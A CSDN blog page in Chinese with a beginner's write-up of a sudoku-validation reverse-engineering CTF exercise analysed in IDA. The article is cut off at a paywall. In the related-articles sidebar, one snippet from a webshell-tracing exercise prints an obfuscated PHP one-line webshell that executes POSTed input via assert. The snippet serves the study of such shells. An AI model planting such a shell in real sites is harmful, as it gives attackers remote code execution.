一次更像C语言代码审计的数独逆向

最新推荐文章于 2022-03-16 16:18:59 发布
最新推荐文章于 2022-03-16 16:18:59 发布
阅读量957 收藏 2
点赞数
分类专栏: 逆向 文章标签: 数独逆向 墨者学院 逆向分析实训-exe(第二题) 新手逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41391117/article/details/83388863
版权

这道题呢是在“墨者学院”上看到的,题目是“逆向分析实训-exe(第2题)“,文末有惊喜,本着学习逆向的想法就去做了下这道题,虽然结果变成了C语言代码审计。。。

另外在做这道题的过程中参考了另外一个大佬的文章,在末尾会给出链接。。。

本人只是一只想学习逆向的菜鸟,文章里可能有错误会不准确的地方,如果有发现请告诉我,非常感谢,没钱的那种~~~穷人,就剩这点脾气了

接下来就开始干活了

IDA打开文件,F5一下,进入main:(菜鸟的自我修养,F5)

看到有success,这个应该就是关键了,要输出success需要满足第一个if(图中1)为假,else里嵌套的第一个if(图中2)为真,小白也不会玩,看到success就直接进入了if ( Sudu::check((Sudu *)&v14) )这个语句,双击跟进这个函数:(这里用血的教训证明了,按部就班的从第一个条件看着走不好吗,啊?)

要返回为真,这里的三个函数的返回值均需要为真,好吧,那就一个个的看,我能怎么办呢,我也不想看,第一个check_block,这里需要注意传入的参数为一个指针的int类型:

这段代码需要结合题目是数独来分析(当然,要是你先看的第一个条件就会好理解很多了),看了老久(我会告诉你我是从大佬的文章里知道的吗,菜鸟不要面子的吗),确认他是对给的数独进行分析,如果满足数独对块的要求,就是每个小的3*3块都是1到9不同的数字,返回值为1,就这样看其实很头疼(大佬没说为什么。。。就只好自己看了。。。),给出自己的分析过程,希望有用:

首先注意这三个地方,第一处,将v2里的值全置为1(除了v2[0],后一样,不用0-8而用1-9是因为1-9刚好是数独可以填的数字),中间将v2里的某几个值置为0(暂且这样说吧),然后最后又对v2的所有值进行判断,如果全部置为0了,return 1,而这是我们要的,否则 return 0,也就是,只要  *(_DWORD *)(a1 + 4 * (v3 + 9 * v4))  的值为1

最低0.47元/天 解锁文章
懒猫@_@
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
实验吧haha.exe(逆向)的解思路
LinJingchun的博客
04-30 1669
最近在学逆向,刚好碰到一道,写一下思路。目地址:http://ctf5.shiyanbar.com/reverse/520windows3/qudong.rar目说明:运行后提示 按流程来,先拉进IDA里按F5看看: 原来Key是通过CMD参数给出。然后是这个,很显眼的反调试: 先干掉他: 改成无论如何都继续程序而不退出:  保存  继续分析知: 1. 关键验证在这里: 比对两个数组,不等就...
墨者 - WebShell代码分析溯源(第2)
吃肉唐僧的博客
07-12 241
下载文件,查看index.php 发现一句话木马 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 解释一下,这是一句话木马的变种 $array[],POST[]都是数组(表单域的名称会自动成为 $_POST 数组中的键), 所以array[]=arra...
安全漏洞--C/C++代码安全漏洞审计技术学习分享
关注互联网安全的小虾米一枚
10-18 8356
0x01 简介 代码审计,大家估计见到最多的一般是web程序的代码审计。然而c/c++这种语言的代码审计估计就很少了。 今天我们要来学习一下,工欲善其事必先利其器,今天介绍一款审计的利器Flawfinder(当然同类的还有很多工具,比如 RATS,RIPS,VCG,Fortify SCA,GOLD,YASCA等等)。该工具我搭建运行在ubuntu16.0.4LTS系统之上。 F
代码审计思路详解
Ciyaso的博客
04-30 6951
代码审计概念 代码审计定义 代码审计(Code audit)是一种以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析。软件代码审计是对编程项目中源代码的全面分析,旨在发现错误,安全漏洞或违反编程约定。 它是防御性编程范例的一个组成部分,它试图在软件发布之前减少错误。 代码审计对象 php,java,C/C++,C#,jsp,asp,net等等 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-j7f2PGUd-1619771792539)(C:\Users\ASUS\App
黑客教你几招消灭代码漏洞的方法
程序IT圈
11-26 430
指针释放完后必须置为空指针指针释放没处理好,容易引发高风险漏洞:内存破坏漏洞。在编程中对指针进行释放后,需要将该指针设置为NULL,以防止后续free指针的误用,从而导致UAF (Use ...
代码审计_ClassLoader
cdyunaq的博客
03-16 637
验证阶段:确保加载类的正确性、保证吗代码对系统没有危害 准备阶段:对于类的静态变量分配内存、并将其初始化为默认值、默认值为0。static final变量默认不会改变 解析:把符号引用转换为直接引用,符号引用是一组描述符,直接引用是直接指向类的指针 初始化 类加载最后阶段、若该类具有父类,则先对父类进行初始化、执行静态变量赋值,成员变量也将被初始化 ClassLoader分类 Bootstrap ClassLoader启动类加载器 o加载java核心类库 o/jre/lib/ 下的...
C语言生成一个随机数独.txt
03-15
利用C语言生成一张可以玩的数独,但只是原始数据
C语言数独代码,(横向输入一道数独
03-05
C语言数独代码,(横向输入一道数独),即可得出所有可能的情况
C语言编程实现数独解法
01-06
编程解决数独,网上查了很多资料,大多数的C语言程序虽然可以运行出结果,但是往往定义了很多全局数组变量来存储待解决数独中每一个空的状态信息(如:通过扫描整个数独表,记录待填的空的位置;记录每个待填空...
C语言实现数独游戏的求解
08-26
数独是一种逻辑游戏,玩家需要在9x9的网格中填入数字,使得每一行、每一列以及每个3x3的小宫格内的数字都恰好出现一次,从1到9不重复。C语言实现数独游戏的求解主要是通过编程算法来解决这个问。 首先,我们来看...
代码审计工具V2.0.3源码20121015
01-16
代码审计工具V2.0.3源码 源码描述: 该版本目前支持单个关键字扫描、批量函数扫描、批量正则匹配,其中正则表达式扫描精确度最高,效率最高。 其他功能: 源码浏览:载入程序源码后,可以在最左边的程序文件列表里面点击浏览源码,扫描出包含关键字的源码,也可以在下边的列表点击直接浏览。代码可以直接复制,或者选择用记事本打开。 漏洞库:每次做代码审计可以在漏洞库建立一个审计文档,方便以后查阅、管理。 扫描配置:自定义扫描函数和正则表达式规则,针对要扫描的程序可以建立不同的规则,其中正则表达式扫描精确度高。 审计技巧:收集了一下PHP代码审计的资料,提供给新手学习。 程序帮助:一些程序信息和作者信息
数独代码 数独代码 数独代码
01-20
数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码数独代码...
自动化代码审计工具
weixin_30756499的博客
07-14 3374
三款自动化代码审计工具 0×01 简介 工欲善其事,必先利其器。 在源代码的静态安全审计中,使用自动化工具代替人工漏洞挖掘,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。在学习PHP源代码审计的过程中,本人搜集使用了多款自动化工具。本文将简要介绍其中三款比较实用的工具:RIPS、VCG、Fortify SCA。 RIPS是一款开...
代码审计keys
nigo134的博客
07-17 148
@addslashes() 在挖掘SQL注入漏洞时,只要参数在拼接到SQL语句前除非有宽字节注入或者其他特殊情况,否则使用了这个函数就不能注入了。 类似:mysql_[real_]escape_string() @文件上传有可能含有sql注入漏洞,当文件名被保存到数据库时。 @PHP输出函数(xss) print, print_r, ehco, printf, sprintf, die, var_dump, var_export @截断问 1.%00截断 由于php是C语言写的,在C语言中\0代表字
一次简单的代码审计
xiaoi123的博客
12-07 661
这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序 本着能省就省,有自行车还造什么轮子的原则 于是乎 git clone https://github.com/chaodada/member.git 经过简单的部署后算是能打开了 后台UI做的真心差评 然后简单的看了下代码,发现几个SQL注入和一个越权 SQL注入 程序使用P...
sudoku(数独) - 算法
用心编码
07-30 3066
在 9 * 9 的宫格中,填写的数据为 1-9,每行不能重复,每列也不能重复,组成的9个小宫格中也不能重复。
给 C# 开发者的代码审查清单
weixin_30933531的博客
08-23 132
  这是为C#开发者准备的通用性代码审查清单,可以当做开发过程中的参考。这是为了确保在编码过程中,大部分通用编码指导原则都能注意到。对于新手和缺乏经验(0到3年工作经验)的开发者,参考这份清单编码会很帮助。  清单   1. 确保没有任何警告(warnings)。   2.如果先执行Code Analysis(启用所有Microsoft Rules)再消除所有警告就好了。   3. 去掉所有没...
C程序逆向破解-入门学习(1)
邓霖涛的博客
12-16 3256
直接进入正,本文学习了解计算机程序的执行原理,以及我们可以如何逆向程序修改程序的执行逻辑的基本原理。 本文从手写C的helloworld程序编译执行到逆向汇编该helloworld程序查看汇编执行,然后对相应的程序指令进行修改实现修改原有程序。 准备: 自行C语言的开发环境,MinGW 32或64位,x32dbg与x64dbg 编写程序hello.c #include <stdio.h> #include <stdlib.h> void main() { /* 我的..
matlab下载.pdf
最新发布
07-14
matlab下载下载方式及注意事项
c语言代码写数独游戏
05-27
好的,以下是C语言代码实现数独游戏的生成和打印: ```c #include <stdio.h> #include <stdlib.h> #include <time.h> #define ROW 9 #define COL 9 // 初始化数独游戏 void init_sudoku(int sudoku[ROW][COL]) { int i, j; for (i = 0; i < ROW; i++) { for (j = 0; j < COL; j++) { sudoku[i][j] = 0; } } } // 打印数独游戏 void print_sudoku(int sudoku[ROW][COL]) { int i, j; for (i = 0; i < ROW; i++) { for (j = 0; j < COL; j++) { printf("%d ", sudoku[i][j]); } printf("\n"); } } // 检查行是否合法 int check_row(int sudoku[ROW][COL], int row, int val) { int j; for (j = 0; j < COL; j++) { if (sudoku[row][j] == val) { return 0; } } return 1; } // 检查列是否合法 int check_col(int sudoku[ROW][COL], int col, int val) { int i; for (i = 0; i < ROW; i++) { if (sudoku[i][col] == val) { return 0; } } return 1; } // 检查3x3的宫格是否合法 int check_box(int sudoku[ROW][COL], int row, int col, int val) { int i, j, row_start, col_start; row_start = (row / 3) * 3; col_start = (col / 3) * 3; for (i = row_start; i < row_start + 3; i++) { for (j = col_start; j < col_start + 3; j++) { if (sudoku[i][j] == val) { return 0; } } } return 1; } // 检查当前数字是否可行 int check_valid(int sudoku[ROW][COL], int row, int col, int val) { return check_row(sudoku, row, val) && check_col(sudoku, col, val) && check_box(sudoku, row, col, val); } // 递归填充数独游戏 int fill_sudoku(int sudoku[ROW][COL], int row, int col) { // 边界条件:填充完最后一行 if (row == 8 && col == 9) { return 1; } // 边界条件:填充完一行 if (col == 9) { row++; col = 0; } // 如果当前位置已经填充了数字,则跳过 if (sudoku[row][col] > 0) { return fill_sudoku(sudoku, row, col + 1); } // 枚举当前位置可以填充的数字 int val; for (val = 1; val <= 9; val++) { // 检查当前数字是否可行 if (check_valid(sudoku, row, col, val)) { sudoku[row][col] = val; // 递归填充下一个位置 if (fill_sudoku(sudoku, row, col + 1)) { return 1; } // 回溯 sudoku[row][col] = 0; } } return 0; } // 生成数独游戏 void create_sudoku(int sudoku[ROW][COL]) { // 初始化随机数种子 srand(time(NULL)); // 生成第一行的随机排列 int i, j, k, first_row[9]; for (i = 0; i < 9; i++) { first_row[i] = i + 1; } for (i = 0; i < 9; i++) { j = rand() % 9; k = first_row[i]; first_row[i] = first_row[j]; first_row[j] = k; } // 填充第一行 for (j = 0; j < 9; j++) { sudoku[0][j] = first_row[j]; } // 递归填充数独游戏 fill_sudoku(sudoku, 0, 0); } int main() { int sudoku[ROW][COL]; init_sudoku(sudoku); create_sudoku(sudoku); print_sudoku(sudoku); return 0; } ``` 运行以上代码,即可生成一个随机的数独游戏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值